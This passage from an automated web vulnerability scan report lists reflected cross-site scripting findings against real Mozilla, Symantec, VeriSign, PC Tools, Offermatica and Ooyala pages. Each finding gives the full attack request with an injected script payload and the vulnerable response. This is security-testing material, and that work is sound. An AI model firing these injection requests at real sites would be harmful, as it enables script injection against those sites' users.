The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 91fb8<script>alert(1)</script>7f56fd6704d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute91fb8<script>alert(1)</script>7f56fd6704d /openwebfund HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:14:59 GMT Connection: Keep-Alive Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/ Content-Length: 391 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute91fb8<script>alert(1)</script>7f56fd6704d /openwebfund</p>...[SNIP]...
3.9. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: https://donate.mozilla.org
Path: /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 63933<script>alert(1)</script>bf1b7d05258 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund63933<script>alert(1)</script>bf1b7d05258 HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:15:01 GMT Connection: Keep-Alive Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/ Content-Length: 391 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund63933<script>alert(1)</script>bf1b7d05258 </p>...[SNIP]...
3.10. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://donate.mozilla.org
Path: /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 48171<script>alert(1)</script>2ff872bc181 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund?48171<script>alert(1)</script>2ff872bc181 =1 HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:14:56 GMT Connection: Keep-Alive Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/ Content-Length: 394 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund?48171<script>alert(1)</script>2ff872bc181 =1</p>...[SNIP]...
3.11. https://fileconnect.symantec.com/licenselogin.jsp [localeStr parameter]
Summary
Severity: High
Confidence: Firm
Host: https://fileconnect.symantec.com
Path: /licenselogin.jsp
Issue detail
The value of the localeStr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba9ab"%3b528b7643cdb was submitted in the localeStr parameter. This input was echoed as ba9ab";528b7643cdb in the application's response. This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /licenselogin.jsp?localeStr=en_USba9ab"%3b528b7643cdb HTTP/1.1 Host: fileconnect.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:41:59 GMT Content-length: 9332 Content-type: text/html;charset=UTF-8 Pragma: no-cache Content-Language: en-US Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store Connection: close <html> <head> <script language="JavaScript" src="javascript/common.js"></script> <script language="JavaScript" src="javascript/calendar2.js"></script> <...[SNIP]... and channel on the next lines. */ s.pageName = "en/us: biz: FileConnect: Serial Number Input https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_US"; // set page name s.prop2 = "USba9ab";528b7643cdb " // set country s.eVar27 = "USba9ab";528b7643cdb" s.prop3 = "en" // set language s.eVar28 = "en" s.prop27 = "Business"; // set Visitor Segment s.eVar50 = "Business"; s.prop41 = "FileConne...[SNIP]...
3.12. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer [Action_ID parameter]
Summary
Severity: High
Confidence: Certain
Host: https://forms.verisign.com
Path: /websurveys/servlet/ActionMultiplexer
Issue detail
The value of the Action_ID request parameter is copied into the HTML document as plain text between tags. The payload 63579<script>alert(1)</script>6e92133b729 was submitted in the Action_ID parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /websurveys/servlet/ActionMultiplexer?Action_ID=ACT200063579<script>alert(1)</script>6e92133b729 &WSD_mode=3&WSD_surveyInfoID=943&toc=AAAAA-943-01-26&brand=01&country=26&oldToc=w29810323919638016&cid=47D9F8084F78B063 HTTP/1.1 Host: forms.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 80 Date: Fri, 09 Sep 2011 21:41:22 GMT Missing or unknown action ID: ACT200063579<script>alert(1)</script>6e92133b729
3.13. http://free.pctools.com/favicon.ico [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://free.pctools.com
Path: /favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e810"><script>alert(1)</script>d4356c76675 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /favicon.ico5e810"><script>alert(1)</script>d4356c76675 HTTP/1.1 Host: free.pctools.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2; __utma=9079138.240734855.1315623957.1315623957.1315623957.1; __utmb=9079138.1.10.1315623957; __utmc=9079138; __utmz=9079138.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=1.1056361608.1315623957.1315623957.1315623957.1; __utmb=1.0.10.1315623957; __utmc=1; __utmz=1.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.3.4 Content-Type: text/html; charset=UTF-8 Expires: Fri, 09 Sep 2011 22:05:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 22:05:59 GMT Content-Length: 8247 Connection: close Vary: Accept-Encoding Set-Cookie: reftrack=freesite%2320110909170147%7Cdeleted%2320110909170223; expires=Sat, 08-Sep-2012 21:02:24 GMT; path=/; domain=.pctools.com <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Get PC Tools AntiVi...[SNIP]... <form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/favicon.ico5e810"><script>alert(1)</script>d4356c76675 /">...[SNIP]...
3.14. http://free.pctools.com/free-antivirus/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://free.pctools.com
Path: /free-antivirus/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36661"><script>alert(1)</script>55a70ea0c85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /free-antivirus36661"><script>alert(1)</script>55a70ea0c85 / HTTP/1.1 Host: free.pctools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.3.4 Content-Type: text/html; charset=UTF-8 Expires: Fri, 09 Sep 2011 21:42:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:42:03 GMT Content-Length: 8274 Connection: close Set-Cookie: reftrack=freesite%2320110909163826; expires=Sat, 08-Sep-2012 20:38:28 GMT; path=/; domain=.pctools.com <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Get PC Tools AntiVi...[SNIP]... <form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/free-antivirus36661"><script>alert(1)</script>55a70ea0c85 /">...[SNIP]...
3.15. http://free.pctools.com/free-antivirus/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://free.pctools.com
Path: /free-antivirus/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fde3"><script>alert(1)</script>f1a4218a279 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /free-antivirus/?7fde3"><script>alert(1)</script>f1a4218a279 =1 HTTP/1.1 Host: free.pctools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.3.4 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Fri, 09 Sep 2011 21:42:02 GMT Date: Fri, 09 Sep 2011 21:42:02 GMT Content-Length: 17979 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Free AntiVirus & An...[SNIP]... <form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/free-antivirus/?7fde3"><script>alert(1)</script>f1a4218a279 =1">...[SNIP]...
3.16. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /toolbar/activate.v
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32d94'-alert(1)-'503da824579 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /toolbar/activate.v?32d94'-alert(1)-'503da824579 =1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:47:52 GMT Content-Type: text/html;charset=utf-8 Content-Length: 7303 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <script type="text/javascript"> $(document).ready(function(){ $('#kaptchaRefresh').click(function(event) { $('#kaptchaImage').hide().attr('src', '/kaptcha.jpg?32d94'-alert(1)-'503da824579 =1?' + Math.floor(Math.random()*100)).fadeIn(); }); $('#kaptchaImage').click(function (event) { $(this).hide().attr('src', '/kaptcha.jpg?32d94'-alert(1)-'503da824579=1?' + Math.floor(Math.random()...[SNIP]...
3.17. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /toolbar/activate.v
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3603"><script>alert(1)</script>2c6cb160cb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /toolbar/activate.v?b3603"><script>alert(1)</script>2c6cb160cb7 =1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:47:50 GMT Content-Type: text/html;charset=utf-8 Content-Length: 7348 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <img id="kaptchaImage" src="/kaptcha.jpg?b3603"><script>alert(1)</script>2c6cb160cb7 =1" alt="Click for a different one!" title="Click for a different one!" />...[SNIP]...
3.18. https://idprotect.verisign.com/toolbar/download.v [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /toolbar/download.v
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa418"><script>alert(1)</script>feea2f12a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /toolbar/download.v?fa418"><script>alert(1)</script>feea2f12a5 =1 HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/home.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:52 GMT Content-Type: text/html Content-Length: 6622 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... iv tabindex="0" style="cursor:pointer;padding-top:10px;" onkeydown="if ((event.which && event.which == 13) || (event.keyCode && event.keyCode == 13)) {location.href='/toolbar/install.v?fa418"><script>alert(1)</script>feea2f12a5 =1'}" onclick="location.href='/toolbar/install.v?fa418">...[SNIP]...
3.19. https://idprotect.verisign.com/toolbar/home.v [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /toolbar/home.v
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141ab"><script>alert(1)</script>41143d22db1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /toolbar/home.v?141ab"><script>alert(1)</script>41143d22db1 =1 HTTP/1.1 Host: idprotect.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:08 GMT Content-Type: text/html Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <div tabindex="0" style="cursor:pointer;" onclick="location.href='/toolbar/download.v?141ab"><script>alert(1)</script>41143d22db1 =1'" onkeydown="if ((event.which && event.which == 13) || (event.keyCode && event.keyCode == 13)) {location.href='/toolbar/download.v?141ab">...[SNIP]...
3.20. https://idprotect.verisign.com/toolbar/install.v [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /toolbar/install.v
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e6ab"><script>alert(1)</script>b6843a60d67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /toolbar/install.v?2e6ab"><script>alert(1)</script>b6843a60d67 =1 HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/download.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:52 GMT Content-Type: text/html Content-Length: 6866 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a id="download" href="/toolbar/downloadIE.v?2e6ab"><script>alert(1)</script>b6843a60d67 =1">...[SNIP]...
3.21. http://mbox3.offermatica.com/m2/verisign/mbox/standard [mbox parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mbox3.offermatica.com
Path: /m2/verisign/mbox/standard
Issue detail
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9179f<script>alert(1)</script>b30639e2275 was submitted in the mbox parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_20119179f<script>alert(1)</script>b30639e2275 &mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM" Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:26:45 GMT; Path=/m2/verisign Content-Type: text/javascript Content-Length: 195 Date: Fri, 09 Sep 2011 21:26:45 GMT Server: Test & Target mboxFactoryDefault.get('VRSN_HP_AccBox_20119179f<script>alert(1)</script>b30639e2275 ',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");
3.22. http://player.ooyala.com/player.js [playerId parameter]
Summary
Severity: High
Confidence: Certain
Host: http://player.ooyala.com
Path: /player.js
Issue detail
The value of the playerId request parameter is copied into a JavaScript rest-of-line comment. The payload dbef4%0aalert(1)//8baddfff4b was submitted in the playerId parameter. This input was echoed as dbef4 alert(1)//8baddfff4b in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69dbef4%0aalert(1)//8baddfff4b &width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Last-Modified: Fri, 09 Sep 2011 21:26:29 GMT Content-Type: text/javascript; charset=utf-8 X-Ooyala-Server-Id: i-17d1a37b X-Pad: avoid browser bug Content-Length: 26426 Cache-Control: private, max-age=300 Date: Fri, 09 Sep 2011 21:26:30 GMT Connection: close Vary: Accept-Encoding (function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f...[SNIP]... "class":"OoyalaVideoPlayer",data:T};},getEmbedParams:function(T,i){return{allowScriptAccess:"always",allowFullScreen:"true",bgcolor:"#000000",wmode:T,flashvars:i};}};A.init("ooyalaPlayer_44h86_g6tvkk69dbef4 alert(1)//8baddfff4b ",a,d,"transparent","http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf","http",o,F,m,j,B);}else{var N=e.createContainerDiv(q+"_InstallFlash",a,d,B);N.innerHTML='<...[SNIP]...
3.23. http://player.ooyala.com/player.js [wmode parameter]
Summary
Severity: High
Confidence: Certain
Host: http://player.ooyala.com
Path: /player.js
Issue detail
The value of the wmode request parameter is copied into a JavaScript rest-of-line comment. The payload 61651%0aalert(1)//96a754f882a was submitted in the wmode parameter. This input was echoed as 61651 alert(1)//96a754f882a in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent61651%0aalert(1)//96a754f882a HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Last-Modified: Fri, 09 Sep 2011 21:26:35 GMT Content-Type: text/javascript; charset=utf-8 X-Ooyala-Server-Id: i-fa51be9b X-Pad: avoid browser bug Content-Length: 26322 Cache-Control: private, max-age=300 Date: Fri, 09 Sep 2011 21:26:35 GMT Connection: close Vary: Accept-Encoding (function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f...[SNIP]... Player",data:T};},getEmbedParams:function(T,i){return{allowScriptAccess:"always",allowFullScreen:"true",bgcolor:"#000000",wmode:T,flashvars:i};}};A.init("ooyalaPlayer235820917_10kbk3k",a,d,"transparent61651 alert(1)//96a754f882a ","http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf","http",o,F,m,j,B);}else{var N=e.createContainerDiv(q+"_InstallFlash",a,d,B);N.innerHTML='<table width="'+a+'...[SNIP]...
3.24. https://press.verisign.com/easyir/customrel.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://press.verisign.com
Path: /easyir/customrel.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 11807--><script>alert(1)</script>5053ee4c92a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /easyir/customrel.do?11807--><script>alert(1)</script>5053ee4c92a =1 HTTP/1.1 Host: press.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:38 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: Servlet/3.0; JBossAS-6 Content-Length: 1328 Connection: close Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <!-- so that relative references will use absolute url from jsp and not from calling ...[SNIP]... <br/> QUERY:11807--><script>alert(1)</script>5053ee4c92a =1 <br/>...[SNIP]...
